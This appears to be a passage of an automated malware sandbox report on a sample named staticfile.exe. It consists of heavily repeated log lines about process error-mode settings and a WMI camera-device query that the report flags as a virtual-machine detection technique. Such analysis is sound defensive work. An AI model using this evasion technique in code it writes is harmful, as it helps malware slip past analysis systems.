                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
